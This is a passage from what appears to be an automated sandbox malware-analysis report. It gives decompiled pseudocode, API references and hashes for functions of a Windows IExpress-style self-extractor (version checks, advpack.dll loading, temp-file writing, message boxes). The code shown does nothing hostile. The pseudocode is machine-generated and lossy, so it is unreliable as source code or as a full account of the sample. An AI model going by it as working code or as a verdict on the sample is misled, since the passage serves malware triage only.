												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E009428E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x949a40 = _t119;
						 *0x948184 = 1;
						 *0x948180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x949a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x948184 = _t135;
							 *0x948180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E009444B9(0, _t138);
					L66:
					return E00946CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x009436f9
0x00943700
0x0094370c
0x00943716
0x00943718
0x0094371b
0x00943721
0x0094372b
0x0094373d
0x00943745
0x00943746
0x00943746
0x00943749
0x009437ab
0x009437ad
0x009437ae
0x009437b3
0x009437b8
0x009437b8
0x009437bf
0x009437bf
0x009437c5
0x00000000
0x00000000
0x009437cb
0x009437cd
0x00000000
0x00000000
0x009437d5
0x009437db
0x009437e8
0x009437ea
0x009437ea
0x009437ea
0x009437f0
0x009437f6
0x00943805
0x00943817
0x0094382b
0x00943830
0x00943836
0x0094383b
0x0094383d
0x009438eb
0x009438eb
0x009438f2
0x0094390c
0x00943911
0x00943911
0x00943913
0x0094394d
0x0094394d
0x0094394f
0x009438a9
0x009438a9
0x009438b0
0x009438b2
0x009438b9
0x009438bb
0x009438c1
0x00943975
0x009438c7
0x009438de
0x009438e0
0x009438e0
0x0094397b
0x0094397d
0x009439a9
0x0094397f
0x00943982
0x0094398b
0x0094398d
0x0094398f
0x0094399f
0x009439a1
0x00943991
0x00943991
0x00943991
0x0094398f
0x009439af
0x009439b6
0x00943a0f
0x00943a0f
0x00943a11
0x00943a13
0x00943a19
0x00000000
0x009439b8
0x009439b8
0x009439ba
0x00000000
0x00000000
0x009439bc
0x009439bf
0x00000000
0x00000000
0x009439c3
0x009439c9
0x009439ce
0x009439d0
0x009439e3
0x009439e5
0x009439e6
0x009439f1
0x009439f7
0x009439fa
0x00943a01
0x00943a04
0x00000000
0x00000000
0x00943a06
0x00943a09
0x00943a09
0x00943a0b
0x00943a0b
0x00000000
0x00943a09
0x009439fc
0x00000000
0x009439fc
0x009439d3
0x009439d8
0x009439da
0x00000000
0x00000000
0x00000000
0x009439dc
0x009439b6
0x00943955
0x0094395b
0x00000000
0x00000000
0x00943961
0x00943963
0x00000000
0x00000000
0x00943969
0x00943969
0x00000000
0x00943969
0x00943915
0x00943915
0x0094391b
0x0094391f
0x00000000
0x00000000
0x0094392d
0x00943933
0x00943938
0x0094393a
0x00000000
0x00000000
0x00943940
0x00943946
0x0094394b
0x00000000
0x0094394b
0x00000000
0x009438f2
0x00943843
0x00943845
0x00000000
0x00000000
0x0094384b
0x0094384d
0x00943883
0x00943885
0x00000000
0x00000000
0x0094389a
0x0094389e
0x0094389e
0x00000000
0x00000000
0x009438a0
0x009438a0
0x009438a2
0x00000000
0x00000000
0x009438a4
0x00000000
0x009438a4
0x0094384f
0x00943851
0x00943857
0x0094386e
0x00943877
0x0094387b
0x00000000
0x00000000
0x00000000
0x00943881
0x00943859
0x0094385c
0x00943862
0x00943866
0x00000000
0x00000000
0x00943868
0x00000000
0x009438f4
0x009438f4
0x009438f5
0x009438fb
0x00943901
0x00943901
0x00000000
0x0094390a
0x0094374b
0x0094374e
0x0094375c
0x00943764
0x00943769
0x0094376e
0x00943771
0x0094379c
0x0094379f
0x00000000
0x00000000
0x009437a3
0x009437a4
0x00000000
0x009437a4
0x00943773
0x00943777
0x00943778
0x0094377f
0x00943781
0x0094378e
0x0094378e
0x00943794
0x00000000
0x00943794
0x00943783
0x00000000
0x00000000
0x00943785
0x0094378c
0x00000000
0x00000000
0x00000000
0x0094378c
0x00943750
0x00000000
0x0094372d
0x0094372d
0x0094396b
0x0094396b
0x0094396c
0x0094396e
0x0094396f
0x00943a1e
0x00943a1e
0x00943a22
0x00943a27
0x00943a3e
0x00943a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00943723
MessageBeep.USER32(00000000), ref: 009439C3
MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 009439F1

Strings

lenta, xrefs: 009439E9, 00943A19
3, xrefs: 00943785

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lenta
API String ID: 2519184315-4216304122
Opcode ID: 30b256d6473b5f4380357e39d99661c9c9ac6cc7fb6036c599c03b7f7161d749
Instruction ID: de7e5e2d20f2cd08ea56648e0b22e4a186893cc49137e51a87b9c0d34d66f1bc
Opcode Fuzzy Hash: 30b256d6473b5f4380357e39d99661c9c9ac6cc7fb6036c599c03b7f7161d749
Instruction Fuzzy Hash: FF9104B1A152249BEB34CF35CD81FAAB7B4AB85304F1581A9D889DB281DB748F81DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00946495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00946495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x948004; // 0xec518a5e
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00941781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0094658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00946CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00946495
0x00946495
0x009464a0
0x009464a7
0x009464ab
0x009464bd
0x009464c2
0x009464d3
0x009464df
0x009464e8
0x00946502
0x009464ee
0x009464f9
0x009464f9
0x00946516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 009464DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 009464F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00946502

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009464AC
advpack.dll, xrefs: 009464C2, 009464CD, 00946501

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-2613218439
Opcode ID: 830a002c4e8749d282057fd0db4c96d86f7e8a8ad19634d2de4d54f1399d67c7
Instruction ID: b1371c4a895310701d768a5e485209fa9779b5f35781f083c9e140765ec7155e
Opcode Fuzzy Hash: 830a002c4e8749d282057fd0db4c96d86f7e8a8ad19634d2de4d54f1399d67c7
Instruction Fuzzy Hash: 3501F4B4A58108ABDB20EB64DC49FEE7378EB97314F500295F585921C0DF70AECACB52

Uniqueness

Uniqueness Score: -1.00%

Function 009428E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009428E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00942773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00942A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00942A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x009428f1
0x009428f4
0x009428f7
0x009428f9
0x009428fc
0x009428ff
0x00942901
0x00942907
0x00942a62
0x00942a64
0x0094290d
0x0094290d
0x0094290f
0x00942912
0x00942920
0x00942937
0x00000000
0x00000000
0x00942944
0x0094294a
0x0094294f
0x00942a2f
0x00942a32
0x00942a34
0x00942a37
0x00942a41
0x00000000
0x00000000
0x00942955
0x0094295e
0x00942962
0x00942969
0x0094296f
0x00942974
0x0094298c
0x00942a20
0x00942a21
0x00942a27
0x00942a4c
0x00942a4f
0x00942a50
0x00942a53
0x00942a56
0x00942a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x009429b2
0x009429b2
0x009429b5
0x009429bd
0x009429c3
0x009429cc
0x009429d5
0x009429d7
0x009429da
0x009429dd
0x009429df
0x009429ec
0x009429f8
0x009429fc
0x009429ff
0x00942a02
0x00942a07
0x00942a0a
0x00942a0f
0x00942a19
0x00942a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00942a0f
0x0094298c
0x00942974
0x00942962
0x00000000
0x0094294f
0x00942912
0x00942a65
0x00942a68
0x00942a6c
0x00942a6f
0x00942a6f
0x00942a7d

APIs

GlobalFree.KERNEL32 ref: 00942A6F

Part of subcall function 00942773: CharUpperA.USER32(EC518A5E,00000000,00000000,00000000), ref: 009427A8
Part of subcall function 00942773: CharNextA.USER32(0000054D), ref: 009427B5
Part of subcall function 00942773: CharNextA.USER32(00000000), ref: 009427BC
Part of subcall function 00942773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942829
Part of subcall function 00942773: RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942852
Part of subcall function 00942773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942870
Part of subcall function 00942773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009428A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00943938,?,?,?,?,-00000005), ref: 00942958
GlobalLock.KERNEL32 ref: 00942969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00943938,?,?,?,?,-00000005,?), ref: 00942A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00942A81

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 980a23dc083a1df467467454910611ba6626689f9818aae67cba43416b37a99d
Instruction ID: 4759c011d1650ea05138f72bef5e7f43e969ea6232f928a6d2ecf53c5bb39dfc
Opcode Fuzzy Hash: 980a23dc083a1df467467454910611ba6626689f9818aae67cba43416b37a99d
Instruction Fuzzy Hash: FB512635E00219EBDB25CF98C884EAEFBB9FF48700F54412AF955E3251DB319A41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00944169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00944169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0094468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0094468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E009444B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0094417d
0x0094418f
0x00944193
0x009441b7
0x009441d3
0x009441e6
0x00000000
0x009441e7
0x009441d5
0x009441d6
0x009441d8
0x009441d9
0x009441da
0x009441df
0x009441e1
0x00000000
0x009441e1
0x009441b9
0x009441ba
0x009441bc
0x009441bd
0x009441be
0x00000000
0x009441be
0x00000000

APIs

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009430B4), ref: 00944189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009430B4), ref: 009441E7

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Strings

FINISHMSG, xrefs: 00944173, 009441AB
<None>, xrefs: 009441C5

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 7f07eb4c8ac022d85fcf009edd1a5ee5051c7640010864a976f776ad78debd8a
Instruction ID: b655503f3e3f6897a505c0928196c8de59d3a44167a01cff4b6c87c12e25059a
Opcode Fuzzy Hash: 7f07eb4c8ac022d85fcf009edd1a5ee5051c7640010864a976f776ad78debd8a
Instruction Fuzzy Hash: 4C01FFB53882243BF3242A654C96F7B268EDBEA799F114039B706E2190DAA8CC4141B6

Uniqueness

Uniqueness Score: -1.00%

Function 009419E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E009419E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x948004; // 0xec518a5e
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E009443D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x949a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00946CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x009419e0
0x009419e0
0x009419eb
0x009419f2
0x009419f9
0x009419fc
0x00941a01
0x00941a2a
0x00941a2e
0x00941a3e
0x00941a4f
0x00941a62
0x00941a6a
0x00000000
0x00941a03
0x00941a06
0x00941a20
0x00941a20
0x00941a08
0x00941a08
0x00941a14
0x00000000
0x00941a16
0x00941a18
0x00941a70
0x00941a72
0x00941a72
0x00941a14
0x00941a06
0x00941a81

APIs

EndDialog.USER32(?,?), ref: 00941A18
GetDesktopWindow.USER32 ref: 00941A24
LoadStringA.USER32(?,?,00000200), ref: 00941A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00941A62
MessageBeep.USER32(000000FF), ref: 00941A6A

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: ace313cdc9143f2cbd1679599ed5c1dcade027201d1f7fa4bb4cbdfea6da7ac3
Instruction ID: c7a33181fdbc6874d9e191da4d84475fa4fc2f43dbe05320dcf46f660bd46d5a
Opcode Fuzzy Hash: ace313cdc9143f2cbd1679599ed5c1dcade027201d1f7fa4bb4cbdfea6da7ac3
Instruction Fuzzy Hash: C411C435529109AFDB10EF64EE08FAE77B8EF4A300F108154F922D3191DA30AE41EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00947155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00947155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x948004; // 0xec518a5e
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x948004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x948004 = _t39;
				}
				_t37 =  !_t36;
				 *0x948008 = _t37;
				return _t37;
			}

0x0094715d
0x00947161
0x00947165
0x00947178
0x00947182
0x0094718e
0x00947197
0x009471a0
0x009471b1
0x009471b8
0x009471c4
0x009471c7
0x009471cb
0x009471d5
0x009471da
0x009471da
0x009471dc
0x009471dc
0x009471e2
0x009471e5
0x009471ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00947182
GetCurrentProcessId.KERNEL32 ref: 00947191
GetCurrentThreadId.KERNEL32 ref: 0094719A
GetTickCount.KERNEL32 ref: 009471A3
QueryPerformanceCounter.KERNEL32(?), ref: 009471B8

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: ce01d974f7de00aa4154ce591234063ceaa6f9f8047b430e0a1752765a3edc92
Instruction ID: b063145254bc4e624fd0ba22d56ad2d0ccfdc88e5c3e21d269a87a66ac98df6a
Opcode Fuzzy Hash: ce01d974f7de00aa4154ce591234063ceaa6f9f8047b430e0a1752765a3edc92
Instruction Fuzzy Hash: 7511F879D29208AFCB10DBF8EA48A9EB7F8EB4E315F614855D805E7210EB309A049B41

Uniqueness

Uniqueness Score: -1.00%

Function 009463C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E009463C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x948004; // 0xec518a5e
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00941781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
				E0094658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x949124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x949124 = 0x80070052;
					_t37 = 0;
				}
				return E00946CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x009463cb
0x009463d2
0x009463d8
0x009463ea
0x009463f3
0x00946401
0x00946402
0x00946410
0x00946415
0x00946433
0x00946438
0x00946449
0x00946463
0x0094646d
0x00946477
0x00946477
0x0094647a
0x0094643a
0x0094643a
0x00946444
0x00946444
0x00946492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094642D
